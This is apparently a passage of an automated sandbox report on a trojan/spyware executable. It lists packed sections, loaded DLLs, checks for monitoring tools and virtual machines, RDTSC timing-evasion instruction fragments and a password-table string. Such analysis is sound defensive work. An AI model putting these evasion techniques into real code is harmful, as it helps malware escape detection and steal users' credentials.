                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A4C8C90_2_00A4C8C9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ACA8C20_2_00ACA8C2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA48C50_2_00AA48C5
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009FC8EB0_2_009FC8EB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A268DD0_2_00A268DD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8A8360_2_00A8A836
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC08320_2_00AC0832
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0680A0_2_00A0680A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A388080_2_00A38808
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC48170_2_00AC4817
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AE28100_2_00AE2810
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A868790_2_00A86879
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0098C8400_2_0098C840
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009E687A0_2_009E687A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A609A40_2_00A609A4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3E9B60_2_00A3E9B6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F49830_2_009F4983
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2E9BE0_2_00A2E9BE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A529930_2_00A52993
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A009970_2_00A00997
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA29930_2_00AA2993
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AE09E90_2_00AE09E9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAA9E30_2_00AAA9E3
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD89FB0_2_00AD89FB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9A9C80_2_00A9A9C8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AC9EB0_2_009AC9EB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A349DB0_2_00A349DB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2C9D80_2_00A2C9D8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A729DC0_2_00A729DC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009C09E00_2_009C09E0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00B369CC0_2_00B369CC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB692F0_2_00AB692F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009E49180_2_009E4918
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A69100_2_009A6910
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2A9380_2_00A2A938
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ACC9370_2_00ACC937
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8490B0_2_00A8490B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5C9140_2_00A5C914
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD497F0_2_00AD497F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0099E9600_2_0099E960
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A56AB30_2_00A56AB3
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA2AB10_2_00AA2AB1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F6A800_2_009F6A80
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A20A810_2_00A20A81
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A8ABC0_2_009A8ABC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A94A8F0_2_00A94A8F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA0A8D0_2_00AA0A8D
                Source: 4KDKJjRzm8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4KDKJjRzm8.exeStatic PE information: Section: ZLIB complexity 0.9995340584150327
                Source: 4KDKJjRzm8.exeStatic PE information: Section: jwydwysy ZLIB complexity 0.9944206492335438
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009B2070 CoCreateInstance,0_2_009B2070
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465375179.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465998398.0000000005C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 4KDKJjRzm8.exeReversingLabs: Detection: 63%
                Source: 4KDKJjRzm8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile read: C:\Users\user\Desktop\4KDKJjRzm8.exeJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: 4KDKJjRzm8.exeStatic file information: File size 1875456 > 1048576
                Source: 4KDKJjRzm8.exeStatic PE information: Raw size of jwydwysy is bigger than: 0x100000 < 0x19fe00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeUnpacked PE file: 0.2.4KDKJjRzm8.exe.980000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jwydwysy:EW;pczmnouq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jwydwysy:EW;pczmnouq:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: 4KDKJjRzm8.exeStatic PE information: real checksum: 0x1d1d3c should be: 0x1d73d3
                Source: 4KDKJjRzm8.exeStatic PE information: section name:
                Source: 4KDKJjRzm8.exeStatic PE information: section name: .idata
                Source: 4KDKJjRzm8.exeStatic PE information: section name:
                Source: 4KDKJjRzm8.exeStatic PE information: section name: jwydwysy
                Source: 4KDKJjRzm8.exeStatic PE information: section name: pczmnouq
                Source: 4KDKJjRzm8.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2355A push ss; retn 0005h0_3_05C2356A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2355A push ss; retn 0005h0_3_05C2356A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25109 push eax; retn 0005h0_3_05C2510A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25109 push eax; retn 0005h0_3_05C2510A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25109 push eax; retn 0005h0_3_05C2510A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25109 push eax; retn 0005h0_3_05C2510A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2514F push edx; retn 0005h0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2355A push ss; retn 0005h0_3_05C2356A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C2355A push ss; retn 0005h0_3_05C2356A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25259 push eax; retn 0005h0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_3_05C25271 push ss; retn 0005h0_3_05C25272
                Source: 4KDKJjRzm8.exeStatic PE information: section name: entropy: 7.979083511203261
                Source: 4KDKJjRzm8.exeStatic PE information: section name: jwydwysy entropy: 7.9543925612046

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B427D3 second address: B427D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B427D7 second address: B427F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB3DD3D95EEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B427F3 second address: B42804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B42804 second address: B42821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD3D95EDh 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB3DD3D95E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B42821 second address: B42825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B42825 second address: B4287E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD3D95F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007FB3DD3D95EEh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 jmp 00007FB3DD3D95F0h 0x0000001b pushad 0x0000001c jmp 00007FB3DD3D95F9h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4287E second address: B42884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B54F57 second address: B54F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B54F5E second address: B54F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB3DD280BB6h 0x00000009 jmp 00007FB3DD280BBAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FB3DD280BBBh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B54F85 second address: B54FA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB3DD3D95F3h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB3DD3D95E6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B55293 second address: B552B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnp 00007FB3DD280BDAh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B552B6 second address: B552BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57978 second address: B57987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57987 second address: B579BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB3DD3D95F2h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB3DD3D95F9h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B579BF second address: B579D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B579D1 second address: B579F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB3DD3D95F1h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B579F3 second address: B579F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B579F9 second address: B57A48 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d or dword ptr [ebp+122D2BC6h], ebx 0x00000013 lea ebx, dword ptr [ebp+1245280Ah] 0x00000019 xor cl, 00000031h 0x0000001c xchg eax, ebx 0x0000001d jnc 00007FB3DD3D9607h 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 jbe 00007FB3DD3D95E6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57AAE second address: B57B8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB3DD280BC0h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FB3DD280BC9h 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D2A86h] 0x0000001b mov dword ptr [ebp+122D19A6h], edi 0x00000021 push 34E55E5Ch 0x00000026 ja 00007FB3DD280BCCh 0x0000002c jmp 00007FB3DD280BC6h 0x00000031 xor dword ptr [esp], 34E55EDCh 0x00000038 pushad 0x00000039 mov eax, dword ptr [ebp+122D28D6h] 0x0000003f push ecx 0x00000040 js 00007FB3DD280BB6h 0x00000046 pop esi 0x00000047 popad 0x00000048 push 00000003h 0x0000004a add dword ptr [ebp+122D2BCBh], edx 0x00000050 sub dword ptr [ebp+122D269Bh], edi 0x00000056 push 00000000h 0x00000058 jg 00007FB3DD280BBBh 0x0000005e movsx esi, ax 0x00000061 push 00000003h 0x00000063 pushad 0x00000064 mov edx, dword ptr [ebp+122D2A8Ah] 0x0000006a mov edi, 1830C1B3h 0x0000006f popad 0x00000070 push 4FA3003Bh 0x00000075 jmp 00007FB3DD280BC0h 0x0000007a add dword ptr [esp], 705CFFC5h 0x00000081 mov dword ptr [ebp+122D2720h], esi 0x00000087 lea ebx, dword ptr [ebp+12452813h] 0x0000008d mov edx, dword ptr [ebp+122D2AE2h] 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 push eax 0x00000097 push edx 0x00000098 jne 00007FB3DD280BB6h 0x0000009e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57B8C second address: B57B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57C19 second address: B57C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57C22 second address: B57CC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jo 00007FB3DD3D95EBh 0x0000000e mov ecx, 4168C65Eh 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 call 00007FB3DD3D95ECh 0x0000001b jmp 00007FB3DD3D95EAh 0x00000020 pop ecx 0x00000021 sub edi, dword ptr [ebp+122D2A66h] 0x00000027 popad 0x00000028 push 95246880h 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 pop eax 0x00000031 jg 00007FB3DD3D95E6h 0x00000037 popad 0x00000038 jns 00007FB3DD3D95ECh 0x0000003e popad 0x0000003f add dword ptr [esp], 6ADB9800h 0x00000046 mov ecx, dword ptr [ebp+122D2846h] 0x0000004c push 00000003h 0x0000004e sbb si, 7CA7h 0x00000053 push 00000000h 0x00000055 mov dword ptr [ebp+122D580Dh], edx 0x0000005b push 00000003h 0x0000005d mov cx, dx 0x00000060 sub edx, dword ptr [ebp+122D286Eh] 0x00000066 call 00007FB3DD3D95E9h 0x0000006b jmp 00007FB3DD3D95F8h 0x00000070 push eax 0x00000071 pushad 0x00000072 push ebx 0x00000073 jns 00007FB3DD3D95E6h 0x00000079 pop ebx 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57CC8 second address: B57CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FB3DD280BC4h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
